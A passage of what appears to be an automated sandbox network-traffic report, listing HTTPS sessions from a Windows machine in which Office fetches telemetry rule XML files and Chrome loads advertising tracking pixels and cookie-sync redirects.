                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          97192.168.2.74984813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 7c051060-401e-008c-630d-1c86c2000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091239Z-17db6f7c8cf96l6t7bwyfgbkhw000000053g00000000ah2u
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          98192.168.2.74984913.107.246.604432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 400
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: e9bc8845-c01e-008d-06d9-1a2eec000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091239Z-17db6f7c8cf96l6t7bwyfgbkhw0000000560000000006dnb
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          99192.168.2.749853148.113.153.944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC713OUTGET /?partner=147&mapped=7d931d72-b6cd-40d8-9aaa-91033ac03d95&icm&gdpr=0&gdpr_consent=&cver HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel.onaudience.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cookie=10907476198d4755; done_redirects147=1
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC487INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: cookie=10907476198d4755; Max-Age=31536000; Expires=Tue, 14 Oct 2025 09:12:40 GMT; Path=/; Domain=.onaudience.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: done_redirects109=1; Max-Age=86400; Expires=Tue, 15 Oct 2024 09:12:40 GMT; Path=/; Domain=.onaudience.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          location: https://pixel.onaudience.com/?partner=109&icm&cver&gdpr=0&smartmap=1&redirect=tags.bluekai.com%2Fsite%2F33141%3F%26id%3D%25m
                                                                                                                                                                                                                                                                                                                                                                          content-length: 0
                                                                                                                                                                                                                                                                                                                                                                          connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          100192.168.2.74985935.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC743OUTGET /396846.gif?served_by=evergreen&partner_uid=790d1d18-a5ba-44b9-b204-a432fb8c1174 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: idsync.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: rlas3=cFd4eRXc6kRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: rlas3=oidxsW5ixWRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; Path=/; Domain=rlcdn.com; Expires=Tue, 14 Oct 2025 09:12:40 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:40 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          101192.168.2.74986054.77.205.1054432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC620OUTPOST /6/map HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bcp.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 439
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://cdn-tc.33across.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://cdn-tc.33across.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC439OUTData Raw: 7b 22 72 22 3a 7b 22 72 69 64 22 3a 74 72 75 65 7d 2c 22 6d 22 3a 7b 22 64 63 63 22 3a 31 36 33 31 31 2c 22 73 72 63 22 3a 22 53 59 4e 43 4a 53 22 2c 22 63 68 22 3a 7b 22 62 72 61 6e 64 73 22 3a 5b 7b 22 62 72 61 6e 64 22 3a 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 31 37 22 7d 2c 7b 22 62 72 61 6e 64 22 3a 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 38 22 7d 2c 7b 22 62 72 61 6e 64 22 3a 22 43 68 72 6f 6d 69 75 6d 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 31 37 22 7d 5d 2c 22 66 75 6c 6c 56 65 72 73 69 6f 6e 4c 69 73 74 22 3a 5b 7b 22 62 72 61 6e 64 22 3a 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"r":{"rid":true},"m":{"dcc":16311,"src":"SYNCJS","ch":{"brands":[{"brand":"Google Chrome","version":"117"},{"brand":"Not;A=Brand","version":"8"},{"brand":"Chromium","version":"117"}],"fullVersionList":[{"brand":"Google Chrome","version":"117.0.5938.134"}
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Server: 10.45.17.68
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: _cc_dc=1;Path=/;Domain=crwdcntrl.net;Expires=Fri, 11-Jul-2025 09:07:00 GMT;SameSite=None;Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: _cc_id=d623ac854d7c5259de086b3e7c50fd78;Path=/;Domain=crwdcntrl.net;Expires=Fri, 11-Jul-2025 09:07:00 GMT;SameSite=None;Secure
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://cdn-tc.33across.com
                                                                                                                                                                                                                                                                                                                                                                          Server: Jetty(9.4.38.v20210224)
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC156INData Raw: 7b 22 70 69 64 22 3a 22 64 36 32 33 61 63 38 35 34 64 37 63 35 32 35 39 64 65 30 38 36 62 33 65 37 63 35 30 66 64 37 38 22 2c 22 63 22 3a 5b 7b 22 6b 22 3a 22 5f 63 63 5f 69 64 22 2c 22 76 22 3a 22 64 36 32 33 61 63 38 35 34 64 37 63 35 32 35 39 64 65 30 38 36 62 33 65 37 63 35 30 66 64 37 38 22 2c 22 65 22 3a 32 33 33 32 38 30 30 30 7d 5d 2c 22 69 64 73 22 3a 5b 7b 22 63 22 3a 22 63 6f 72 65 22 2c 22 65 22 3a 22 31 37 32 38 39 38 33 35 36 30 37 32 39 22 7d 5d 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"pid":"d623ac854d7c5259de086b3e7c50fd78","c":[{"k":"_cc_id","v":"d623ac854d7c5259de086b3e7c50fd78","e":23328000}],"ids":[{"c":"core","e":"1728983560729"}]}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          102192.168.2.749874148.113.153.944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC743OUTGET /?partner=109&icm&cver&gdpr=0&smartmap=1&redirect=tags.bluekai.com%2Fsite%2F33141%3F%26id%3D%25m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel.onaudience.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cookie=10907476198d4755; done_redirects147=1; done_redirects109=1
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC277INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: cookie=10907476198d4755; Max-Age=31536000; Expires=Tue, 14 Oct 2025 09:12:40 GMT; Path=/; Domain=.onaudience.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          location: https://tags.bluekai.com/site/33141?&id=d11143b562001d29
                                                                                                                                                                                                                                                                                                                                                                          content-length: 0
                                                                                                                                                                                                                                                                                                                                                                          connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          103192.168.2.74986813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 448
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 95529de3-401e-0064-4a25-1b54af000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091240Z-17db6f7c8cfgqlr45m385mnngs00000004u0000000002wtd
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          104192.168.2.74986613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 425
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 0fbb1da2-e01e-0085-1521-1cc311000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091240Z-17db6f7c8cfqxt4wrzg7st2fm800000006ag000000003x9r
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
